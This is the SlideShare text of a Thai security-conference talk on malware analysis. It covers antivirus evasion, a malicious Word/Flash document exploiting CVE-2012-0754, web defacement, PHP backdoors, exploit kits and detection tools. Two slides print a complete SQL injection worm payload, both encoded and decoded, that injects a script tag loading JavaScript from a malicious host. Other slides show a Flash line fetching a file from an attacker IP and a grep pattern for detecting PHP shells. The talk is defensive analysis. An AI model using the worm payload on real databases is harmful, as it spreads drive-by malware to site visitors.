SlideShare a Scribd company logo
www.cdicconference.com




                        “Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”




           ชำแหละโปรแกรมไม่พงประสงค์ ด้วยเทคนิคเหนือเมฆ
                            ึ

                                 อ. ประธาน พงศ์ทิพย์ฤกษ์
SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F
                  Section Manager, Senior Information Security Consultant
                               ACIS Professional Center

                                                                                                           1
Let’s Party Rock

 Next Generation for Malware
    Malware Analysis

 Web Based Malware
    Back to the Past
    Back to the Future

 Lab Challenge



                                2   2
www.cdicconference.com




“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”




Next Generation of Malware

                                                                                   3
Old Malware fashion

 Executable file
   Packer, Crypter => FUD just 1 Week !!
 Spyware / Adware
 Rogue Security Software
 Virus / Worm
 USB Autorun



                                            4   4
Antivirus Detected


                Gotcha !!




                            5   5
Virustotal




             6   6
Virustotal – One Week later




                              7   7
Anubis: Analyzing Binary File




                                8   8
Latest Malware fashion

 MS Office+Flash Player
 PDF Reader
 Mobile Application
 Social Network Application
 Web Browser Toolbar
 Web based Malware



                               9   9
Bypassing Antivirus


              Ninja Techniques




                             10   10
Malware Analysis


                   11   11
CVE-2012-0754: SWF in DOC

 “Iran’s Oil and Nuclear Situation.doc”
    Contains flash instructing it to download and
   Parse a malformed MP4.

 OS Affect
    Adobe Flash Player before 10.3.183.15 and 11.x
   Before 11.1.102.62 on Windows, Mac OS X, Linux
   And Solaris

 Mobile Affect
    Adobe Flash Player before 11.1.111.6 on
   Android 2.x and 3.x and before 11.1.115.6 on
   Android 4.x


                                                      12   12
Document Analysis

   Decompiled Flash from file
       This.MyNS.play(“http://208.115.230.76/test.mp4”);

   Whois – 208.115.230.76
       208.115.230.76
        76-230-115-208.static.reverse.lstn.net
        Host reachable, 77 ms. average, 2 of 4 pings lost
        208.115.192.0 - 208.115.255.255
        Limestone Networks, Inc.
        400 S. Akard Street
        Suite 200
        Dallas
        TX
        75202
        United States



                                                            13   13
Process Monitor network log




                              14   14
Process Monitor network log




                              15   15
Traffic and C&C (us.exe)




                           16   16
Virus Analysis – us.exe




                          17   17
Target Analysis

 Whois – 199.192.156.134
   199.192.156.134
    Host reachable, 89 ms. average
    199.192.152.0 - 199.192.159.255
    VPS21 LTD
    38958 S FREMONT BLVD
    FREMONT
    CA
    94536
    United States
    zou, jinhe
    +1-408-205-7550



                                      18   18
www.cdicconference.com




“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”




      Web Based Malware

                                                                                  19
Back to the Past


                   20   20
Web Defacement




                 21   21
Zone-H




         22   22
Ddos Tool




            23   23
Hack 4 Fun and Profit




                        24   24
Back to the Future


                     25   25
About My Memory

   2008
       Oishi website was hacked without defacement
       Kaspersky AV alert for “A little javascript file”

   2009
       SQL injection worms on MSSQL
       Affect many Bank on Thailand

   2010
       Google and Firefox alert for malware website
       Obfuscation JS to bypass AV

   2011
       Many website was blocked by Google Malware




                                                            26   26
SQL Injection Worms

';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043
004C004100520045002000400054002000760061007200630068006100720
0280032003500350029002C00400043002000760061007200630068006100
72002800320035003500290020004400450043004C0041005200450020005
400610062006C0065005F0043007500720073006F00720020004300550052
0053004F005200200046004F0052002000730065006C00650063007400200
061002E006E0061006D0065002C0062002E006E0061006D00650020006600
72006F006D0020007300790073006F0062006A00650063007400730020006
1002C0073007900730063006F006C0075006D006E00730020006200200077
006800650072006500200061002E00690064003D0062002E0069006400200
061006E006400200061002E00780074007900700065003D00270075002700
200061006E0064002000280062002E00780074007900700065003D0039003
90020006F007200200062002E00780074007900700065003D003300350020
006F007200200062002E00780074007900700065003D00320033003100200
06F007200200062002E00780074007900700065003D003100AS%20NVARC
HAR(4000));EXEC(@S);--




                                                          27    27
SQL Injection Worms

';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(D E C L A R E
@T varchar(255),@C varchar(255) DECLARE T
able_Cursor CURSOR FOR select a.name,b.nam
e from sysobjects a,syscolumns b where a.id
=b.id and a.xtype='u' and (b.xtype=99 or b.x
type=35 or b.xtype=231 or b.xtype=167) OPE
N Table_Cursor FETCH NEXT FROM                       Table_Cur
sor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=r
trim(convert(varchar,['+@C+']))+''<script sr
c=http://www.fengnima.cn/k.js></script>''')
FETCH NEXT FROM              Table_Cursor INTO @T,@C
END CLOSE Table_Cursor DEALLOCATE Table_C
u r s o r undefined AS%20NVARCHAR(4000));EXEC(@S);--




                                                           28    28
Web Application Backdoor




                           29   29
Web Application Backdoor -
           FUD




                             30   30
Redbull.php (PHP Backdoor)




                             31   31
Insert Malicious JS into
    config.inc.php




                           32   32
Crimepack Exploit Kit




                        33   33
Crimeware Exploit Kit




                        34   34
Drive-By Download

                             Visit Malicious Website

                             Malicious JS execute
                                                                        Web Server



                                          Redirect to Malware Server



                            Exploit Browser / Flash Player
Reverse Shell to Attacker



                                                                       Malware Server




                                                                                        35   34
Google Malware Alert




                       36   35
Google Diagnostic




                    37   36
http://www.stopbadware.org/hom
         e/reviewinfo




                             38   37
http://sitecheck.sucuri.net/scanner




                                  39   38
http://sucuri.net/malware/malwar
         e-entry-mwhta7




                               40   39
http://sucuri.net/malware/malwar
         e-entry-mwhta7




                               41   40
http://www.urlvoid.com




                         42   41
Detect Webserver Backdoor

   Manual Source review
   NeoPI – Neohapsis
   PHP Shell Scanner
   http://25yearsofprogramming.com/php/findmaliciouscode.htm
   grep -RPl --include=*.{php,txt,asp}
    "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdi
    r|fopen|fclose|readfile) *(”
    /var/www/




                                                                    43   42
PHP Shell Scanner




                    44   43
Undetectable #1




                  45   44
Undetectable #2




                  46   45
JS De-Obfuscate Tool

   Google Chrome Developer Tools
   Firebug (Firefox’s plugin)
   JSDebug (Firefox’s plugin)
   Javascript Deobfuscator (Firefox’s plugin)
   Malzilla
   Rhino
   SpiderMonkey




                                                 47   46
Simple JS Obfuscate




                      48   47
Simple JS Obfuscate




                      49   48
www.cdicconference.com




“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”




            Lab Challenge

                                                                                  50
Be Safe

www.cdicconference.com



                         51   50

More Related Content

PPTX
Zeus Dissected
PDF
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
PDF
The Evolution of the Fileless Click-Fraud Malware Poweliks
PDF
Dissecting ZeuS malware
PDF
Security Theatre (PHP Leuven)
PPTX
CoinMiners are Evasive - BsidesTLV
PPTX
Malware's Most Wanted: How to tell BADware from adware
PDF
[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen
Zeus Dissected
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
The Evolution of the Fileless Click-Fraud Malware Poweliks
Dissecting ZeuS malware
Security Theatre (PHP Leuven)
CoinMiners are Evasive - BsidesTLV
Malware's Most Wanted: How to tell BADware from adware
[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen

What's hot (19)

PDF
Security theatre (Scotland php)
PDF
Wannacry | Technical Insight and Lessons Learned
PPTX
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
PDF
42 - Malware - Understand the Threat and How to Respond
PDF
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
PDF
TRITON: The Next Generation of ICS Malware
PDF
Security Theatre - PHP UK Conference
PDF
Security Theatre - Benelux
PDF
Malware Evasion Techniques
PPTX
EverSec + Cyphort: Big Trends in Cybersecurity
PDF
Internet security: a landscape of unintended consequences
PPTX
MMW June 2016: The Rise and Fall of Angler
PDF
Secure webdev 3.0
PPTX
MMW Anti-Sandbox Techniques
PDF
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
PDF
Case Studies and Lessons Learned from SSL/TLS Certificate Verification Vulner...
PDF
Denis Zhuchinski Ways of enhancing application security
PDF
BSidesSF 2016 - A year in the wild: fighting malware at the corporate level
PDF
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
Security theatre (Scotland php)
Wannacry | Technical Insight and Lessons Learned
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
42 - Malware - Understand the Threat and How to Respond
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
TRITON: The Next Generation of ICS Malware
Security Theatre - PHP UK Conference
Security Theatre - Benelux
Malware Evasion Techniques
EverSec + Cyphort: Big Trends in Cybersecurity
Internet security: a landscape of unintended consequences
MMW June 2016: The Rise and Fall of Angler
Secure webdev 3.0
MMW Anti-Sandbox Techniques
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Case Studies and Lessons Learned from SSL/TLS Certificate Verification Vulner...
Denis Zhuchinski Ways of enhancing application security
BSidesSF 2016 - A year in the wild: fighting malware at the corporate level
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
Ad

Viewers also liked (7)

PDF
Collective classification for unknown malware detection - SECRYPT 2011
PDF
Malware classification and detection
PDF
Detection of Malware Downloads via Graph Mining (AsiaCCS '16)
PPT
Ethical_Hacking_ppt
PDF
DEF CON 20 - Botnets Die Hard - Owned and Operated
PDF
Automated Hacking Tools - Meet the New Rock Stars in the Cyber Underground
PDF
Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...
Collective classification for unknown malware detection - SECRYPT 2011
Malware classification and detection
Detection of Malware Downloads via Graph Mining (AsiaCCS '16)
Ethical_Hacking_ppt
DEF CON 20 - Botnets Die Hard - Owned and Operated
Automated Hacking Tools - Meet the New Rock Stars in the Cyber Underground
Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...
Ad

Similar to Advanced Malware Analysis (20)

PDF
Layer8 exploitation: Lock'n Load Target
PDF
Fireshark - Brucon 2010
PDF
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
PPTX
Men in the Server Meet the Man in the Browser
PDF
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
PPTX
2011-10 The Path to Compliance
PDF
Dan Guido SOURCE Boston 2011
PDF
Introduction to the advanced persistent threat and hactivism
PPTX
Anatomy of an Attack
PDF
Battling Malware In The Enterprise
PPTX
Spiceworld 2011 - AppRiver breakout session
PDF
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
PDF
How to Stop Man in the Browser Attacks
PPTX
Cyberjutitsu101coleevertzfinal 1296250763392-phpapp02
PPT
An introduction to honeyclient technology
PPTX
NCompass Live: IT Security for Libraries
PPTX
NCompass Live: IT Security for Libraries
PDF
Xforce 2008 Annual Report
PDF
Xforce 2008 Annual Report
PPTX
Advanced Persistent Threats: Reality or Myth
Layer8 exploitation: Lock'n Load Target
Fireshark - Brucon 2010
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
Men in the Server Meet the Man in the Browser
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
2011-10 The Path to Compliance
Dan Guido SOURCE Boston 2011
Introduction to the advanced persistent threat and hactivism
Anatomy of an Attack
Battling Malware In The Enterprise
Spiceworld 2011 - AppRiver breakout session
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
How to Stop Man in the Browser Attacks
Cyberjutitsu101coleevertzfinal 1296250763392-phpapp02
An introduction to honeyclient technology
NCompass Live: IT Security for Libraries
NCompass Live: IT Security for Libraries
Xforce 2008 Annual Report
Xforce 2008 Annual Report
Advanced Persistent Threats: Reality or Myth

More from Prathan Phongthiproek (20)

PDF
Mobile Defense-in-Dev (Depth)
PDF
The CARzyPire - Another Red Team Operation
PDF
Cyber Kill Chain: Web Application Exploitation
PDF
Mobile App Hacking In A Nutshell
PDF
Jump-Start The MASVS
PDF
OWASP Mobile Top 10 Deep-Dive
PDF
The Hookshot: Runtime Exploitation
PDF
Understanding ransomware
PDF
OWASP Day - OWASP Day - Lets secure!
PDF
Don't Trust, And Verify - Mobile Application Attacks
PDF
Owasp Top 10 Mobile Risks
PDF
Point-Of-Sale Hacking - 2600Thailand#20
PDF
OWASP Thailand-Beyond the Penetration Testing
PDF
Mobile Application Pentest [Fast-Track]
PPTX
Hack and Slash: Secure Coding
PPTX
CDIC 2013-Mobile Application Pentest Workshop
PDF
Web Application Firewall: Suckseed or Succeed
PDF
Tisa mobile forensic
PDF
Tisa-Social Network and Mobile Security
PDF
Tisa social and mobile security
Mobile Defense-in-Dev (Depth)
The CARzyPire - Another Red Team Operation
Cyber Kill Chain: Web Application Exploitation
Mobile App Hacking In A Nutshell
Jump-Start The MASVS
OWASP Mobile Top 10 Deep-Dive
The Hookshot: Runtime Exploitation
Understanding ransomware
OWASP Day - OWASP Day - Lets secure!
Don't Trust, And Verify - Mobile Application Attacks
Owasp Top 10 Mobile Risks
Point-Of-Sale Hacking - 2600Thailand#20
OWASP Thailand-Beyond the Penetration Testing
Mobile Application Pentest [Fast-Track]
Hack and Slash: Secure Coding
CDIC 2013-Mobile Application Pentest Workshop
Web Application Firewall: Suckseed or Succeed
Tisa mobile forensic
Tisa-Social Network and Mobile Security
Tisa social and mobile security

Recently uploaded (20)

PDF
Getting started with AI Agents and Multi-Agent Systems
PDF
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
PPTX
The various Industrial Revolutions .pptx
PPTX
Modernising the Digital Integration Hub
PDF
How ambidextrous entrepreneurial leaders react to the artificial intelligence...
PDF
1 - Historical Antecedents, Social Consideration.pdf
PPTX
Tartificialntelligence_presentation.pptx
PDF
Developing a website for English-speaking practice to English as a foreign la...
PDF
A comparative study of natural language inference in Swahili using monolingua...
PDF
Hindi spoken digit analysis for native and non-native speakers
PDF
Architecture types and enterprise applications.pdf
PDF
Hybrid model detection and classification of lung cancer
PDF
NewMind AI Weekly Chronicles - August'25-Week II
PDF
WOOl fibre morphology and structure.pdf for textiles
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
PPT
What is a Computer? Input Devices /output devices
PDF
August Patch Tuesday
PDF
From MVP to Full-Scale Product A Startup’s Software Journey.pdf
PDF
NewMind AI Weekly Chronicles – August ’25 Week III
PDF
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
Getting started with AI Agents and Multi-Agent Systems
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
The various Industrial Revolutions .pptx
Modernising the Digital Integration Hub
How ambidextrous entrepreneurial leaders react to the artificial intelligence...
1 - Historical Antecedents, Social Consideration.pdf
Tartificialntelligence_presentation.pptx
Developing a website for English-speaking practice to English as a foreign la...
A comparative study of natural language inference in Swahili using monolingua...
Hindi spoken digit analysis for native and non-native speakers
Architecture types and enterprise applications.pdf
Hybrid model detection and classification of lung cancer
NewMind AI Weekly Chronicles - August'25-Week II
WOOl fibre morphology and structure.pdf for textiles
gpt5_lecture_notes_comprehensive_20250812015547.pdf
What is a Computer? Input Devices /output devices
August Patch Tuesday
From MVP to Full-Scale Product A Startup’s Software Journey.pdf
NewMind AI Weekly Chronicles – August ’25 Week III
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...

Advanced Malware Analysis